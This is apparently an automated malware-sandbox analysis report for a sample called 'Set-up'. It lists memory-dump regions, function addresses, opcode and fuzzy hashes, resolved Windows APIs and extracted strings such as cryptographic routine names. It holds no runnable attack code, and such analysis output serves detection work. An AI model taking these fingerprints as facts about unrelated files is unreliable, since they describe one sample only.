                                                                                                                                  • Source File: 00000000.00000002.2074582672.00000000058E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 058E1000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_58e1000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 8a58efd48ad9eb501542e796f597dd7beff04c9c101294cd842b6175ec86d680
                                                                                                                                  • Instruction ID: 56e1d0f16106318263be8ba1dda9fb2e0896f2bf398bcf973d6940ef978cb7e9
                                                                                                                                  • Opcode Fuzzy Hash: 8a58efd48ad9eb501542e796f597dd7beff04c9c101294cd842b6175ec86d680
                                                                                                                                  • Instruction Fuzzy Hash: 7F0171F1B007014BEB209E54D4D8B3BB2ADAF95604F19593CD81997282DB76EC05C6D6
                                                                                                                                  Function 058EE67F Relevance: .1, Instructions: 62COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2074582672.00000000058E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 058E1000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_58e1000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: bc573e91eae7927d5c6402807b30cc6889312ed58a0c693ca89364110eed8da6
                                                                                                                                  • Instruction ID: 0211731999b41ae2e0cd59fac082a5c81a717552d43e576896b9a017648d0c42
                                                                                                                                  • Opcode Fuzzy Hash: bc573e91eae7927d5c6402807b30cc6889312ed58a0c693ca89364110eed8da6
                                                                                                                                  • Instruction Fuzzy Hash: D3214F759F9218ABDA225F20FC0383C3FE2A3113047544025F82DAA639FF312959DF6A
                                                                                                                                  Function 00E6C620 Relevance: .1, Instructions: 61COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2072612567.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001204000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073062501.0000000001307000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073080127.0000000001308000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.0000000001319000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.000000000131E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.00000000017B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 3408eeb8982a725a101de4aa323ede861e6816114b25f5b8bd022c873b518723
                                                                                                                                  • Instruction ID: 1b7545264a6f8216abd193ab9252f692a29f89de1c6b499282b99652909149b5
                                                                                                                                  • Opcode Fuzzy Hash: 3408eeb8982a725a101de4aa323ede861e6816114b25f5b8bd022c873b518723
                                                                                                                                  • Instruction Fuzzy Hash: 6511E6327315218BD718CF39C991AA1B7E1FB98314B184B79E83ACF2C6C730A615CB94
                                                                                                                                  Function 0590596B Relevance: .1, Instructions: 55COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2074582672.00000000058E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 058E1000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_58e1000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 36f8c271c4280e21959b8cf430b7dd84c819ff4d5739f37ff2a537a593ab7dbb
                                                                                                                                  • Instruction ID: 3b81621d0876d59c50a7b3e01929cfa0ff8ed1134e81c2d9ea6f24b311fa45d0
                                                                                                                                  • Opcode Fuzzy Hash: 36f8c271c4280e21959b8cf430b7dd84c819ff4d5739f37ff2a537a593ab7dbb
                                                                                                                                  • Instruction Fuzzy Hash: 99017C7411C3508FCB289F14809163AB7F0FF56350FA52C5DE4C657281DA349882DF86
                                                                                                                                  Function 058EA158 Relevance: .1, Instructions: 53COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2074582672.00000000058E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 058E1000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_58e1000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: f2365e41b1d7819627c7ddc181f841b4794dfc39a3060f656a434c9c13e523b8
                                                                                                                                  • Instruction ID: 9c7df0870510b9ed9d331a34ed7ef9e11ff11b2115f381d7106817bddd923191
                                                                                                                                  • Opcode Fuzzy Hash: f2365e41b1d7819627c7ddc181f841b4794dfc39a3060f656a434c9c13e523b8
                                                                                                                                  • Instruction Fuzzy Hash: 4311802524E3C1DA8356C66D08C004FBF925EFA008F989E9DF5C42B387C1A0DA19C7AB
                                                                                                                                  Function 058E7250 Relevance: .1, Instructions: 52COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2074582672.00000000058E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 058E1000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_58e1000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: e9e28d7e0a9ab1d332ac1cf9dd72c94cadf000b3a6096b0dc83e2b67c6eee77e
                                                                                                                                  • Instruction ID: 2048d5f74198f19a6622cb56513e16c211358734e96a5cf009a96d676bee1e04
                                                                                                                                  • Opcode Fuzzy Hash: e9e28d7e0a9ab1d332ac1cf9dd72c94cadf000b3a6096b0dc83e2b67c6eee77e
                                                                                                                                  • Instruction Fuzzy Hash: 96012D7B75C61D0BD710DC699C80966B3E2E7CA114F0C413CF955D3305E534EE074194
                                                                                                                                  Function 05470D6B Relevance: .0, Instructions: 33COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2074330703.0000000005470000.00000040.00001000.00020000.00000000.sdmp, Offset: 05470000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_5470000_Set-up.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 2f432f6d4d57ddd5edf10f0a55197208a6667e030cc273150dee4b63bd6a15e3
                                                                                                                                  • Instruction ID: bc1f1733eace2ddd0f017ac51a653b9297dbfa1380048e254bedd74e3f96e298
                                                                                                                                  • Opcode Fuzzy Hash: 2f432f6d4d57ddd5edf10f0a55197208a6667e030cc273150dee4b63bd6a15e3
                                                                                                                                  • Instruction Fuzzy Hash: 40019A78A12208DFCB54DF98C198AEEB7B6FB45310F208699D80557394C731AF45DF80
                                                                                                                                  Function 05919C70 Relevance: .0, Instructions: 31COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2074582672.00000000058E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 058E1000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_58e1000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 44fd75b1da1f6f4fa5d3fa4509d683ea35ca2fe13ce572a13e68b98b00cee800
                                                                                                                                  • Instruction ID: e56679b19d3f3fbe50f665bba14f1641307037db9599f268b9000dbeee3c596a
                                                                                                                                  • Opcode Fuzzy Hash: 44fd75b1da1f6f4fa5d3fa4509d683ea35ca2fe13ce572a13e68b98b00cee800
                                                                                                                                  • Instruction Fuzzy Hash: 7FF0A071B993808FD7048E388C5196B7BA5DB9B230F0AAA98E090573A2C2349C45CBA5
                                                                                                                                  Function 05904F56 Relevance: .0, Instructions: 18COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2074582672.00000000058E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 058E1000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_58e1000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: d4246c44e8c475d1fd044e80c4c6df9764c4852f47268c18447f5f4883249a0f
                                                                                                                                  • Instruction ID: 7ca141223962796326884337fb5aceb9314cb10ba10c9c87cfd6603bd9c8cdcd
                                                                                                                                  • Opcode Fuzzy Hash: d4246c44e8c475d1fd044e80c4c6df9764c4852f47268c18447f5f4883249a0f
                                                                                                                                  • Instruction Fuzzy Hash: 11D02221E090394C8E300A01A81023EB0A6EFD3930F043E22DBBF8FAD9E92C94825009
                                                                                                                                  Function 05906E3C Relevance: .0, Instructions: 10COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2074582672.00000000058E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 058E1000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_58e1000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: b15c974c06790375ecb158814cd34ba04ae72fbaf23f19775f432f7339b5e5b8
                                                                                                                                  • Instruction ID: 929b2660538092d20fc5acac889dfe12d08af59994e169053a72be6c151d3723
                                                                                                                                  • Opcode Fuzzy Hash: b15c974c06790375ecb158814cd34ba04ae72fbaf23f19775f432f7339b5e5b8
                                                                                                                                  • Instruction Fuzzy Hash: 40B01260F0900087C6063F10255903DA0398AD7000F043064D406730429E14EC05909F
                                                                                                                                  Function 05906E18 Relevance: .0, Instructions: 9COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2074582672.00000000058E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 058E1000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_58e1000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 24052e42067fa7abf3cdcf6c9b94f3f742bcc5dd8532eebbe0f5eeed34d0e8c7
                                                                                                                                  • Instruction ID: 34d4bc660d0009e59efd3d3c5bc3fca52489d45a7e2ac452e97f0438a10048f2
                                                                                                                                  • Opcode Fuzzy Hash: 24052e42067fa7abf3cdcf6c9b94f3f742bcc5dd8532eebbe0f5eeed34d0e8c7
                                                                                                                                  • Instruction Fuzzy Hash: 6DC04C3494C3028BC224CF04C080576FBF4EB9E240F106818E948A3212D230D4408A46
                                                                                                                                  Function 010683A0 Relevance: 81.3, APIs: 1, Strings: 53, Instructions: 341COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • InitializeCriticalSection.KERNEL32(00000004,460C02D8,00000074,00000000,00000054), ref: 01068415
                                                                                                                                    • Part of subcall function 00E5DD10: GetLastError.KERNEL32(00000107,?,?,460C02D8,00000000,00000000,00000038), ref: 00E5DDDC
                                                                                                                                    • Part of subcall function 00E5DD10: GetLastError.KERNEL32(00000001), ref: 00E5DDEE
                                                                                                                                    • Part of subcall function 00E5DD10: __CxxThrowException@8.LIBVCRUNTIME ref: 00E5DE1D
                                                                                                                                    • Part of subcall function 00E5E110: GetProcAddress.KERNEL32(?,?), ref: 00E5E140
                                                                                                                                    • Part of subcall function 00E5E110: GetLastError.KERNEL32(00000001,?), ref: 00E5E199
                                                                                                                                    • Part of subcall function 00E5E110: __CxxThrowException@8.LIBVCRUNTIME ref: 00E5E1BE
                                                                                                                                    • Part of subcall function 00E5E020: GetProcAddress.KERNEL32(?,?), ref: 00E5E061
                                                                                                                                    • Part of subcall function 00E5E020: GetLastError.KERNEL32 ref: 00E5E06E
                                                                                                                                    • Part of subcall function 00E5E020: __CxxThrowException@8.LIBVCRUNTIME ref: 00E5E0F1
                                                                                                                                    • Part of subcall function 00E84270: __CxxThrowException@8.LIBVCRUNTIME ref: 00E842C9
                                                                                                                                    • Part of subcall function 00E84270: __CxxThrowException@8.LIBVCRUNTIME ref: 00E842E1
                                                                                                                                    • Part of subcall function 00E84270: __CxxThrowException@8.LIBVCRUNTIME ref: 00E842F9
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2072612567.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001204000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073062501.0000000001307000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073080127.0000000001308000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.0000000001319000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.000000000131E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.00000000017B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Exception@8Throw$ErrorLast$AddressProc$CriticalInitializeSection
                                                                                                                                  • String ID: CiDhAgree$CiDhAgreedSize$CiDhFree$CiDhInit$CiDhModulusBits$CiDhPubStore$CiDhPubStoredSize$CiEcdhAgree$CiEcdhAgreedSize$CiEcdhEnum$CiEcdhFree$CiEcdhInit$CiEcdhPubStore$CiEcdhPubStoredSize$CiFree$CiGenRandomBytes$CiHashDigest$CiHashDigestSize$CiHashFree$CiHashKeyedEnum$CiHashKeyedInit$CiHashUnkeyedEnum$CiHashUnkeyedInit$CiHashUpdate$CiInit$CiPkEnum$CiPkPrivAlgs$CiPkPrivFree$CiPkPrivGenerate$CiPkPrivInit$CiPkPrivKeyBits$CiPkPrivMitigateSigTiming$CiPkPrivSigSize$CiPkPrivSign$CiPkPrivStore$CiPkPrivStoredSize$CiPkPubAlgs$CiPkPubFree$CiPkPubFromPriv$CiPkPubInit$CiPkPubKeyBits$CiPkPubStore$CiPkPubStoredSize$CiPkPubVerify$CiSymEnum$CiSymFree$CiSymInfo$CiSymInit$CiSymMsgDecrypt$CiSymMsgEncrypt$CiSymMsgPeekLen$CiSymProcess$CiSymProcessInPlace
                                                                                                                                  • API String ID: 1031632368-4179614984
                                                                                                                                  • Opcode ID: acea69a679631ec3f582487ad4dff1b6b382ba317ecbd8cec6dbbcc0051cc682
                                                                                                                                  • Instruction ID: b42030af640e0a315d23bc96c9bc2b24507e6ea860b308ccdebd96379630e7d1
                                                                                                                                  • Opcode Fuzzy Hash: acea69a679631ec3f582487ad4dff1b6b382ba317ecbd8cec6dbbcc0051cc682
                                                                                                                                  • Instruction Fuzzy Hash: AEF1DC70A21A0AAFD34CDF31CA52BEAF7A4FF10701F41596DE81557A51EB706A28CBD0
                                                                                                                                  Function 00E4D960 Relevance: 33.3, APIs: 11, Strings: 8, Instructions: 73libraryloaderthreadCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • InterlockedCompareExchange.KERNEL32(0131AE18,00000001,00000000), ref: 00E4D9A9
                                                                                                                                  • GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00E4D9C4
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,OpenConsoleW), ref: 00E4D9D2
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,DuplicateConsoleHandle), ref: 00E4D9E3
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,CloseConsoleHandle), ref: 00E4D9F4
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,InvalidateConsoleDIBits), ref: 00E4DA05
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,VerifyConsoleIoHandle), ref: 00E4DA16
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetProcessId), ref: 00E4DA27
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,CompareStringOrdinal), ref: 00E4DA38
                                                                                                                                  • InterlockedExchange.KERNEL32(0131AE18,00000002), ref: 00E4DA4A
                                                                                                                                  • SwitchToThread.KERNEL32(?,?,?,?,?,00E48C63,00000000,7FFFFFFE,460C02D8,460C02D8,00000000,460C02D8,00000000,00000000), ref: 00E4DA88
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2072612567.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001204000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073062501.0000000001307000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073080127.0000000001308000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.0000000001319000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.000000000131E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.00000000017B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AddressProc$ExchangeInterlocked$CompareHandleModuleSwitchThread
                                                                                                                                  • String ID: CloseConsoleHandle$CompareStringOrdinal$DuplicateConsoleHandle$GetProcessId$InvalidateConsoleDIBits$OpenConsoleW$VerifyConsoleIoHandle$kernel32.dll
                                                                                                                                  • API String ID: 925111853-1511978065
                                                                                                                                  • Opcode ID: 9275a95a30b2315367ab4bbb6fb058f8e9722943bf70d70b00f2840c5ecc032c
                                                                                                                                  • Instruction ID: 5c63e5a6dacc585486b3493d19d2527d198eb4e524107a8a05b7a9ead4588ccb
                                                                                                                                  • Opcode Fuzzy Hash: 9275a95a30b2315367ab4bbb6fb058f8e9722943bf70d70b00f2840c5ecc032c
                                                                                                                                  • Instruction Fuzzy Hash: 8D21C475681340EFD339CF25EC4AB6A7BB8FB49702F001569F821E2248C7B42964CBE4
                                                                                                                                  Function 00F076D0 Relevance: 31.7, APIs: 1, Strings: 17, Instructions: 181COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00F0793C
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2072612567.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001204000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073062501.0000000001307000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073080127.0000000001308000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.0000000001319000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.000000000131E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.00000000017B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Exception@8Throw
                                                                                                                                  • String ID: %d %d$%d:%d:%d$14:05:00$Apr$Aug$Aug 1 2024$Dec$Feb$GetRealBuildTimeStamp: mktime() returned -1$Jan$Jul$Jun$Mar$May$Nov$Oct$Sep
                                                                                                                                  • API String ID: 2005118841-2800337880
                                                                                                                                  • Opcode ID: 82288e3f1d67d70a2fe6dbdf7906a44fcc2ef829d1ee7f17ed64542c547a9b59
                                                                                                                                  • Instruction ID: 026078257467c56eb840a40731e3c155115517c4dcf3d1d74f1b04c7d17731a5
                                                                                                                                  • Opcode Fuzzy Hash: 82288e3f1d67d70a2fe6dbdf7906a44fcc2ef829d1ee7f17ed64542c547a9b59
                                                                                                                                  • Instruction Fuzzy Hash: B051FBF1E95304EADF05EBA2ED06FDD72F8AB94B14F100069E818B61C4E7719A04EB95
                                                                                                                                  Function 00E4DA79 Relevance: 31.6, APIs: 10, Strings: 8, Instructions: 56libraryloaderthreadCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • InterlockedCompareExchange.KERNEL32(0131AE18,00000001,00000000), ref: 00E4D9A9
                                                                                                                                  • GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00E4D9C4
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,OpenConsoleW), ref: 00E4D9D2
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,DuplicateConsoleHandle), ref: 00E4D9E3
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,CloseConsoleHandle), ref: 00E4D9F4
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,InvalidateConsoleDIBits), ref: 00E4DA05
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,VerifyConsoleIoHandle), ref: 00E4DA16
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetProcessId), ref: 00E4DA27
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,CompareStringOrdinal), ref: 00E4DA38
                                                                                                                                  • InterlockedExchange.KERNEL32(0131AE18,00000002), ref: 00E4DA4A
                                                                                                                                  • SwitchToThread.KERNEL32(?,?,?,?,?,00E48C63,00000000,7FFFFFFE,460C02D8,460C02D8,00000000,460C02D8,00000000,00000000), ref: 00E4DA88
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2072612567.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001204000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073062501.0000000001307000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073080127.0000000001308000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.0000000001319000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.000000000131E000.00000004.00000001.01000000.00000003.sdmpDownload File
